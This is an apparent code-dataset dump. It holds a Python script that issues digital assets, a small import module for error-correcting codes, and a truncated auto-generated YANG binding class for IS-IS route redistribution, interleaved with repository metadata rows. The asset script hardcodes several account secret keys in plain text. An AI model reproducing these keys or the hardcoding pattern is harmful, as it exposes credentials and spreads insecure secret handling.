| 26.511111 | 85 | 0.476111 | 302 | 2,386 | 3.735099 | 0.182119 | 0.042553 | 0.026596 | 0.048759 | 0.776596 | 0.776596 | 0.776596 | 0.776596 | 0.776596 | 0.776596 | 0 | 0.014716 | 0.373428 | 2,386 | 89 | 86 | 26.808989 | 0.739799 | 0.042749 | 0 | 0.725806 | 0 | 0 | 0.118607 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016129 | 0 | 0.016129 | 0.080645 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b857cb52a2d18c321b83b617599e112c8ffd9e7c | 7,844 | py | Python | tasks/issue_assets.py | link-money-dev/robot | 0d61c157c68ff074e51670431744a67a1de9f7da | [
"MIT"
] | null | null | null | tasks/issue_assets.py | link-money-dev/robot | 0d61c157c68ff074e51670431744a67a1de9f7da | [
"MIT"
] | 1 | 2021-06-01T22:34:45.000Z | 2021-06-01T22:34:45.000Z | tasks/issue_assets.py | link-money-dev/robot | 0d61c157c68ff074e51670431744a67a1de9f7da | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
# 该模块给出了一个发行数字资产的例子
# 发行资产需要两个账户:一个是发行账户,一个是分发账户,产生的资产在分发账户里
# 对于本例,产生的资产咋子distributor这个账户里
# 发行账户即:
# 分发账户即:
import wrapper.client as CLIENT
import CONSTANT
constant=CONSTANT.Constant('public')
issuer_private_key_for_LINK='SDCCOAL6ILCJXWQPDZLRNHTMAHLZHC2IIHGPSQMLSIPHRTLNCFNT4A66'
issuer_address_for_LINK='GCA3SBI2Y6AYHLAW2GBTS7C5HTSFW6OTZACHOVJGBQ6JENTE3ZXPNNSL'
distributor_private_key_for_LINK='SCWDXYXEJL6GQWXUADDGFGFPF64ORWHXA7R2FNV4UVS6VIBIQCVD53JH'
distributor_address_for_LINK='GCONR7JZN7VUSFI54BS76VQJRWGUZDLQFPTB7DXHNP6E5KZECUW77VFL'
issuer_private_key_for_CNY='SBWATTQW5UDSVNZ7BVKX3DPR4EJFZCRUBYKRG5SMDESRSD5QWG7VSDQH'
issuer_address_for_CNY='GCNYF4V6CUY2XENJGRHLNB3AQE3RZIOWYHUN6YU5T34N3ZSK4KGCB7DD'
distributor_private_key_for_CNY='SCZVR6ZS3UKV3YHTK5YJJ3E7WD6RLWKJDPRTUNYQQ54BDFAYEQ4JDZ6S'
distributor_address_for_CNY='GB552GC4YLN7O7Z6DDDFOO7ZPK6374H4YZGZ4YJMWQW6HBRRAWNSIIQW'
issuer_private_key_for_OTHERS='SC53U46XXITEIDTDHLKUJAETF2JSLRQ6GKLMEYUAL3YO32EOKPXNFM44'
issuer_address_for_OTHERS='GBTCF6RETMMKZ6NKXIIAL5X3JZEZY2DPIIW77IZ6NWTNIUSAY37EQWAR'
distributor_private_key_for_OTHERS='SCZVR6ZS3UKV3YHTK5YJJ3E7WD6RLWKJDPRTUNYQQ54BDFAYEQ4JDZ6S'
distributor_address_for_OTHERS='GB552GC4YLN7O7Z6DDDFOO7ZPK6374H4YZGZ4YJMWQW6HBRRAWNSIIQW'
# issue LINK
issuer=CLIENT.Client(private_key=issuer_private_key_for_LINK, api_server=constant.API_SERVER)
distributor=CLIENT.Client(private_key=distributor_private_key_for_LINK, api_server=constant.API_SERVER)
result=issuer.issue_asset(distributor.private_key,asset_code='LINK',amount=1000000000)
print(result)
#
# # issue CNY
# issuer=CLIENT.Client(private_key=issuer_private_key_for_CNY, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_CNY, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='CNY',amount=10000000)
# print(result)
#
# # issue FX
# issuer=CLIENT.Client(private_key=issuer_private_key_for_CNY, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_CNY, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='FX',amount=21000000)
# print(result)
# issue Others
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='BTC',amount=21000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='ETH',amount=104000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='LTC',amount=84000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='XRP',amount=100000000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='BCH',amount=21000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='EOS',amount=1000000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='XLM',amount=100000000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='USD',amount=2580000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='ADA',amount=31000000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='XMR',amount=17000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='IOTA',amount=2700000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='DASH',amount=18900000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='TRX',amount=99000000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='NEO',amount=100000000)
# print(result)
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='ETC',amount=107000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='XEM',amount=8999999999)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='ZEC',amount=5000000)
# print(result)
#
# issuer=CLIENT.Client(private_key=issuer_private_key_for_OTHERS, api_server=constant.API_SERVER)
# distributor=CLIENT.Client(private_key=distributor_private_key_for_OTHERS, api_server=constant.API_SERVER)
# result=issuer.issue_asset(distributor.private_key,asset_code='MKR',amount=1000000)
# print(result) | 57.255474 | 107 | 0.865247 | 1,021 | 7,844 | 6.256611 | 0.079334 | 0.173763 | 0.097683 | 0.144646 | 0.784283 | 0.760019 | 0.760019 | 0.760019 | 0.760019 | 0.751409 | 0 | 0.042311 | 0.035824 | 7,844 | 137 | 108 | 57.255474 | 0.802327 | 0.787608 | 0 | 0 | 0 | 0 | 0.438303 | 0.431877 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b867e12732b3d3fca9f32535c7049b8ef51a45f6 | 136 | py | Python | pyqec/classical.py | maxtremblay/pyqec | 2815a85caf6e768686ec355f4abd6baa01c641d4 | [
"MIT"
] | 1 | 2021-01-27T17:02:39.000Z | 2021-01-27T17:02:39.000Z | pyqec/classical.py | maxtremblay/pyqec | 2815a85caf6e768686ec355f4abd6baa01c641d4 | [
"MIT"
] | 5 | 2021-02-25T15:45:26.000Z | 2021-05-26T14:16:48.000Z | pyqec/classical.py | maxtremblay/pyqec | 2815a85caf6e768686ec355f4abd6baa01c641d4 | [
"MIT"
] | 1 | 2021-05-26T08:14:05.000Z | 2021-05-26T08:14:05.000Z | from .pyqec import LinearCode, BinarySymmetricChannel, FlipDecoder
from .pyqec import random_regular_code, hamming_code, repetition_code | 68 | 69 | 0.875 | 16 | 136 | 7.1875 | 0.6875 | 0.156522 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080882 | 136 | 2 | 69 | 68 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b217d7d1df9c1bc97d99c61de65e1ea230838d31 | 28,259 | py | Python | pybind/slxos/v16r_1_00b/routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import match
class ospf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/router/isis/router-isis-cmds-holder/address-family/ipv4/af-ipv4-unicast/af-ipv4-attributes/af-common-attributes/redistribute/ospf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__match','__ospf_metric','__ospf_route_map','__ospf_level1','__ospf_level2','__ospf_level12','__ospf_metric_type',)
_yang_name = 'ospf'
_rest_name = 'ospf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__ospf_metric = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)
self.__ospf_level12 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
self.__ospf_metric_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)
self.__ospf_route_map = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)
self.__ospf_level2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
self.__ospf_level1 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
self.__match = YANGDynClass(base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'router', u'isis', u'router-isis-cmds-holder', u'address-family', u'ipv4', u'af-ipv4-unicast', u'af-ipv4-attributes', u'af-common-attributes', u'redistribute', u'ospf']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'isis', u'address-family', u'ipv4', u'unicast', u'redistribute', u'ospf']
def _get_match(self):
"""
Getter method for match, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/match (container)
"""
return self.__match
def _set_match(self, v, load=False):
"""
Setter method for match, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/match (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_match is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_match() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """match must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)""",
})
self.__match = t
if hasattr(self, '_set'):
self._set()
def _unset_match(self):
self.__match = YANGDynClass(base=match.match, is_container='container', presence=False, yang_name="match", rest_name="match", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Redistribution of OSPF routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='container', is_config=True)
def _get_ospf_metric(self):
"""
Getter method for ospf_metric, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric (conn-metric)
"""
return self.__ospf_metric
def _set_ospf_metric(self, v, load=False):
"""
Setter method for ospf_metric, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric (conn-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_metric() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_metric must be of a type compatible with conn-metric""",
'defined-type': "brocade-isis:conn-metric",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)""",
})
self.__ospf_metric = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_metric(self):
self.__ospf_metric = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4261412863']}), is_leaf=True, yang_name="ospf-metric", rest_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Metric for redistributed routes', u'cli-full-command': None, u'alt-name': u'metric'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='conn-metric', is_config=True)
def _get_ospf_route_map(self):
"""
Getter method for ospf_route_map, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_route_map (rmap-type)
"""
return self.__ospf_route_map
def _set_ospf_route_map(self, v, load=False):
"""
Setter method for ospf_route_map, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_route_map (rmap-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_route_map is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_route_map() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_route_map must be of a type compatible with rmap-type""",
'defined-type': "brocade-isis:rmap-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)""",
})
self.__ospf_route_map = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_route_map(self):
self.__ospf_route_map = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..63']}), is_leaf=True, yang_name="ospf-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route map reference', u'cli-full-command': None, u'alt-name': u'route-map'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='rmap-type', is_config=True)
def _get_ospf_level1(self):
"""
Getter method for ospf_level1, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level1 (empty)
"""
return self.__ospf_level1
def _set_ospf_level1(self, v, load=False):
"""
Setter method for ospf_level1, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level1 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_level1 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_level1() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_level1 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)""",
})
self.__ospf_level1 = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_level1(self):
self.__ospf_level1 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level1", rest_name="level-1", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level1'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1 routes only', u'alt-name': u'level-1', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
def _get_ospf_level2(self):
"""
Getter method for ospf_level2, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level2 (empty)
"""
return self.__ospf_level2
def _set_ospf_level2(self, v, load=False):
"""
Setter method for ospf_level2, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level2 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_level2 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_level2() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_level2 must be of a type compatible with empty""",
'defined-type': "empty",
